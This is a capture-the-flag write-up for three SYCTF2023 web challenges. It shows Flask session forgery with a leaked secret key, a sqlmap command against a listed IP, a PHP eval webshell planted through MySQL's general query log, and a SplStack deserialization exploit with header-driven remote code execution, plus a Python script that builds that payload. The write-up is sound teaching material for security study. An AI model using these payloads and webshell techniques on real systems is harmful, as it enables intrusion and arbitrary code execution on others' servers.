SYCTF2023 WEB writeup

CarelessPy


The landing page is just an image that can also be downloaded. Viewing the page source reveals two routes:

/eval and /login


The /eval route lists a lot of files.

Trying to make it spit out the flag directly doesn't work.

Trying a few directories shows that it will list directory contents.

Reading /app/__pycache__ shows a part.cpython-311.pyc.

Try downloading it.

Later I got hold of part.cpython-36.pyc as well:

/app/__pycache__/part.cpython-36.pyc

Decompiling it gives the source, which contains the Flask session SECRET_KEY:

# decompiled from /app/__pycache__/part.cpython-36.pyc
import os
import random
import hashlib
from flask import *
from lxml import etree
app = Flask(__name__)
app.config['SECRET_KEY'] = 'o2takuXX_donot_like_ntr'

o2takuXX_donot_like_ntr

Session forgery

python3 flask_session_cookie_manager3.py decode -s 'o2takuXX_donot_like_ntr' -c 'eyJpc2xvZ2luIjpmYWxzZX0.ZX_j3Q.TOsx3z2TlcD6FTPFPB_QW9gtN_k'
{'islogin': False}

python3 flask_session_cookie_manager3.py encode -s 'o2takuXX_donot_like_ntr' -t "{'islogin': True}"
eyJpc2xvZ2luIjp0cnVlfQ.ZX_qtA._K8B3zkOdAJGN4sxuHtMWuqhNDQ

After swapping the forged value into the session cookie:


The last step is an XXE. It's clearly the same payload as everyone else's, but mine just wouldn't work.

Sob.

Confronting robot

A blind guess: SQL injection.

sqlmap takes care of the first step (the flags are --columns, --dump and --batch):

python3 sqlmap.py -u 'http://47.108.206.43:27623/?myname=11111' -D robot_data -T name --columns --dump --batch


Visiting /sEcR@t_n@Bodyknow.php reveals several usable pages:

    传输 (transfer): takes a code parameter via POST

    开始挑战 (start challenge): jumps to game.php; submitting a few arbitrary RPS (rock-paper-scissors) choices shows they get compared against NULL:

Notice: Trying to access array offset on value of type null in /var/www/html/game.php on line 31
(the same Notice is repeated ten times)

Fatal error: Uncaught TypeError: Argument 2 passed to loseorwin() must be of the type string, null given, called in /var/www/html/game.php on line 38 and defined in /var/www/html/game.php:11 Stack trace: #0 /var/www/html/game.php(38): loseorwin('R', NULL) #1 {main} thrown in /var/www/html/game.php on line 11

Sending /sEcR@t_n@Bodyknow.php an empty parameter leaks two function names, mysqli_query() and mysqli_fetch_all(), so the page is executing our input as SQL. That suggests writing a webshell through the MySQL general query log. First check whether the log is available (setting these globals needs the SUPER privilege, or SYSTEM_VARIABLES_ADMIN on MySQL 8):

show global variables like "%general%"

Trying to write the shell:

set global general_log='on'
set global general_log_file='/var/www/html/shell.php'
select '<?php eval($_REQUEST['cmd']);?>'

That failed: there is no permission to create that file. The log file is written by the mysqld process itself (secure_file_priv does not apply to general_log_file, which is why this works where INTO OUTFILE would not), so what matters is whether the MySQL OS user can create a new file in the web root; presumably it cannot, but it can append to the existing page, because the general log opens its file in append mode. Note also that the general log records the statement text as received, before parsing, so the payload lands in the file even though the single quotes inside $_REQUEST['cmd'] make the SELECT itself a syntax error.

So writing into the existing page itself works:

set global general_log='on'

set global general_log_file='/var/www/html//sEcR@t_n@Bodyknow.php'

select '<?php eval($_REQUEST['cmd']);?>'

Connect with AntSword (蚁剑); the flag is in game.php.

4号的罗纳尔多 (Ronaldo No. 4)

<?php
error_reporting(0);
highlight_file(__FILE__);
class evil{
    public $cmd;
    public $a;
    public function __destruct(){
        if('VanZZZZY' === preg_replace('/;+/','VanZZZZY',preg_replace('/[A-Za-z_\(\)]+/','',$this->cmd))){
            eval($this->cmd.'givemegirlfriend!');
        } else {
            echo 'nonono';
        }
    }
}

if(!preg_match('/^[Oa]:[\d]+|Array|Iterator|Object|List/i',$_GET['Pochy'])){
    unserialize($_GET['Pochy']);
} else {
    echo 'nonono';
}

The classic setup: the serialized string can't start with O: or a:, so we start with C:. ArrayObject is banned too, so the trick I learned on ctfshow is out, but it turns out the SplStack class works as well (its C: form wraps our evil object, and the name matches none of Array, Iterator, Object or List). Next is getting past __destruct: once letters, underscores and parentheses are stripped from cmd, all that may remain is a single contiguous run of semicolons, so the command can only be nested function calls separated by ; with no quotes, digits, $ or spaces. The remaining problem is the 'givemegirlfriend!' glued onto the end of the eval'd string: __halt_compiler(); stops the compiler, so eval never parses what follows it. With no quotes available, the payload has to be a parameterless RCE, here eval(end(getallheaders())), which evals the value of the last header of the request. exp:

<?php
class evil
{
    public $cmd="eval(end(getallheaders()));__halt_compiler();";
}
$a=new SplStack();
$a->push(new evil());
$b=serialize($a);
echo($b);

// Note: the output has to be rewritten into the C: format; look up the details yourself
// C:8:"SplStack":84:{i:0;:O:4:"evil":1:{s:3:"cmd";s:45:"eval(end(getallheaders()));__halt_compiler();";};}
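Building that C: payload by hand is error-prone (the byte lengths must be exact, and on PHP 7.4+ serialize() emits the O: form for SplStack, which the filter rejects, so you cannot just copy its output), so here is an added example, not part of the original writeup, that generates it and re-checks it against both of the challenge's regexes ported from preg_match/preg_replace to Python's re module. The class name evil, the GET parameter Pochy and the regexes come from the challenge source above; the target URL is a placeholder.

```python
# Added example (not from the original writeup): build the C:-format SplStack
# payload for the challenge above and re-check it against both of the
# challenge's filters, ported to Python's re module. "evil", "Pochy" and the
# regexes are from the challenge source; the target URL is a placeholder.
import re
from urllib.parse import quote

# the gate in front of unserialize(): preg_match('/^[Oa]:[\d]+|Array|Iterator|Object|List/i')
UNSERIALIZE_GATE = re.compile(r"^[Oa]:\d+|Array|Iterator|Object|List", re.IGNORECASE)


def passes_unserialize_filter(payload: str) -> bool:
    """True when the gate regex does not match, i.e. unserialize() will run."""
    return UNSERIALIZE_GATE.search(payload) is None


def passes_destruct_check(cmd: str) -> bool:
    r"""Mirrors 'VanZZZZY' === preg_replace('/;+/','VanZZZZY',
    preg_replace('/[A-Za-z_\(\)]+/','',$cmd)): after letters, '_' and
    parentheses are removed, exactly one run of ';' and nothing else may remain."""
    stripped = re.sub(r"[A-Za-z_()]+", "", cmd)
    return re.sub(r";+", "VanZZZZY", stripped) == "VanZZZZY"


def serialize_evil(cmd: str) -> str:
    r"""O:4:"evil":1:{s:3:"cmd";s:<n>:"<cmd>";} (string lengths are byte counts)."""
    return 'O:4:"evil":1:{s:3:"cmd";s:%d:"%s";}' % (len(cmd.encode()), cmd)


def splstack_payload(cmd: str, flags: int = 0) -> str:
    r"""C:8:"SplStack":<n>:{i:<flags>;:<element>;} -- the Serializable (C:)
    layout of SplDoublyLinkedList, which the ^[Oa]: check does not match
    even though the evil object nested inside it is still O:-encoded."""
    body = "i:%d;:%s;" % (flags, serialize_evil(cmd))
    return 'C:8:"SplStack":%d:{%s}' % (len(body.encode()), body)


def build_exploit_url(base_url: str, cmd: str) -> str:
    """Check both filters locally, then URL-encode the payload into ?Pochy=... ."""
    if not passes_destruct_check(cmd):
        raise ValueError("cmd would fail the __destruct check: %r" % cmd)
    payload = splstack_payload(cmd)
    if not passes_unserialize_filter(payload):
        raise ValueError("payload would be rejected before unserialize()")
    return "%s?Pochy=%s" % (base_url, quote(payload, safe=""))


# parameterless RCE: eval()s the value of the last request header; the
# __halt_compiler() keeps eval from parsing the appended 'givemegirlfriend!'
CMD = "eval(end(getallheaders()));__halt_compiler();"

if __name__ == "__main__":
    print(splstack_payload(CMD))
    print(build_exploit_url("http://target.example/index.php", CMD))  # placeholder URL
```

Send the PHP you want to run (for example system('id');) as the last header of the request, since end(getallheaders()) picks up whichever header arrives last.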